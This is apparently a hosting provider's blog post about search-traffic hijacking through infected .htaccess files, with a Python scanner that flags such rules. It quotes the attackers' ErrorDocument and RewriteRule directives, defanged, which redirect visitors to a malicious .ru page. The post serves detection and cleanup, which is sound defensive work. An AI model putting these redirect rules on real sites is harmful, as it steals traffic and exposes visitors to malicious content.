What is Traffic Theft?

There have been some recent allegations stating that a handful of compromised websites on our network involved with domain traffic “hijacking” was somehow connected to the illegal intrusion in January that caused us to initiate a complete password reset of all FTP and SSH users.

An extensive investigation has revealed that no customer FTP or SSH user accounts have been maliciously accessed due to this password breach. The websites reported as involved with this traffic hijacking have been reviewed and the site owners notified of the issue on their sites.

Domain hijacking has been around as long as web apps have existed, and until bug-free software exists, it will continue to trouble website owners for some time to come. We wanted to explain exactly what is meant by “hijacking” to help clear up some confusion.

Have you ever wondered, “Why would anyone try to hack my website?” Many answer this by presuming they’re too small a target to become a victim of a high-tech crime syndicate, but truth be told these criminals want your sites and they want them badly. Why? Well, it all comes down to money. The more hosts they have compromised, the more money they can make.

Cyber criminals’ main intent is to hit a site and go unnoticed…until it’s time to cash out. Attackers don’t care how big or small you are. If anything, a site run by a small business or a single site owner is more likely to be behind on security updates for the software it runs, and its owner is less likely to monitor it regularly for malicious activity.

The “cash out” phase is usually when our customers first find out that they’ve been compromised. By that time their site(s) are taking part in one or more unscrupulous online activities. We will be doing a short series of posts that cover the methods these attackers use as well as what you should be on the lookout for.

Today we will be going into just one of these attackers’ malicious actions, so you know a little more about what to look for.

Traffic theft: via infected .htaccess files.

If you notice your site’s traffic unexpectedly dropping, or perhaps you’ve been flagged by Google as having “malicious” content, then there’s a good chance your site has been compromised.

What the attackers may have done is set up a new “.htaccess” file on your site or infected your existing one. .htaccess files are read by your web server to govern the way your site behaves. .htaccess files can be created with rules that will steal your legitimate traffic and send the visitor to an attacker’s malicious URL. This attack originally worked by simply infecting a site’s pages via iframe tags, but it has since evolved to utilize .htaccess “RewriteRule” and “ErrorDocument” directives.

Here is a simple example:

ErrorDocument 403 hxxp://congatarcxisi.ru/mays/index.php
ErrorDocument 404 hxxp://congatarcxisi.ru/mays/index.php

And here is a more complicated one:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|…
RewriteRule ^(.*)$ hxxp://congatarcxisi.ru/mays/index.php [R=301,L]

(To explain the above: the attackers are basically taking any search-engine traffic, as identified by the HTTP Referer header, and redirecting it to their site.)

You can check for these types of infections on your own! Just review your site’s .htaccess files (you may need to enable viewing of hidden files in your FTP/SFTP client so you can see “.htaccess”). We are already actively scanning for these infections on our customers’ sites, so if you see an email from our Security team please make sure you review the report and take the recommended actions.
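To make that manual review repeatable, here is an added Python script (not from the original post or the hosting provider’s own scanner) that walks a site directory and flags ErrorDocument and RewriteRule directives whose target is an absolute URL on a host you do not own. The sample .htaccess text is constructed from the directives quoted above, and the allowed_hosts parameter is an assumed way of listing your own domains.

```python
import os
import re
from urllib.parse import urlsplit

# Constructed sample from the directives quoted above ("hxxp" kept so it is not a live link).
SAMPLE_HTACCESS = """RewriteEngine On
ErrorDocument 404 /errors/not-found.html
ErrorDocument 403 hxxp://congatarcxisi.ru/mays/index.php
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu).*$ [NC]
RewriteRule ^(.*)$ hxxp://congatarcxisi.ru/mays/index.php [R=301,L]
RewriteRule ^old-page$ /new-page [R=301,L]
"""
ABSOLUTE_URL = re.compile(r"^(?:hxxps?|https?)://", re.I)
SEARCH_ENGINES = re.compile(r"google|yahoo|bing|ask|baidu|aol", re.I)

def _is_foreign(target, allowed_hosts):  # absolute URL whose host is not one of ours
    return bool(ABSOLUTE_URL.match(target)) and \
        urlsplit(target).hostname not in {h.lower() for h in allowed_hosts}

def scan_htaccess_text(text, allowed_hosts=()):
    """Return (line_no, reason, line) for directives that send visitors off-site."""
    findings, referer_cond = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive, line = parts[0].lower(), raw.strip()
        if directive == "errordocument" and len(parts) >= 3:
            if _is_foreign(parts[2], allowed_hosts):
                findings.append((no, "ErrorDocument points to an external host", line))
        elif directive == "rewritecond" and "HTTP_REFERER" in line.upper():
            referer_cond = referer_cond or bool(SEARCH_ENGINES.search(line))
        elif directive == "rewriterule" and len(parts) >= 3:
            if _is_foreign(parts[2], allowed_hosts):
                reason = "RewriteRule redirects to an external host"
                if referer_cond:  # the preceding RewriteCond singled out search traffic
                    reason += " for search-engine referrers only"
                findings.append((no, reason, line))
            referer_cond = False  # RewriteCond lines apply only to the next RewriteRule
    return findings

def scan_tree(root, allowed_hosts=()):
    """Map each .htaccess under root to its findings; clean files are omitted."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                results[path] = scan_htaccess_text(fh.read(), allowed_hosts)
    return {p: hits for p, hits in results.items() if hits}
```

Run scan_tree against your site’s document root with your own domains in allowed_hosts; anything it reports deserves a look, and an empty result means no off-site ErrorDocument or RewriteRule targets were found.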

Based on the sites we have cleaned up already, these attacks have almost universally been due to insecure website software running on the site in question. You could have the best passwords in the world, but if the apps you’ve installed on your server have any security vulnerabilities or aren’t kept up to date, attackers can still find their way in.

We are open to sharing information about web-based attacks because we strongly believe in cooperation, collaboration, and responsible disclosure regarding Internet security. If you are interested in providing details related to these attacks or have questions for us, please contact our abuse team with information about any projects you may be working on that may be related to these infections and we will be glad to discuss this matter with you further.

In a follow-up post I will cover the life of a web-based attack when a new vulnerability is released (from 0day to 1000day), so stay tuned!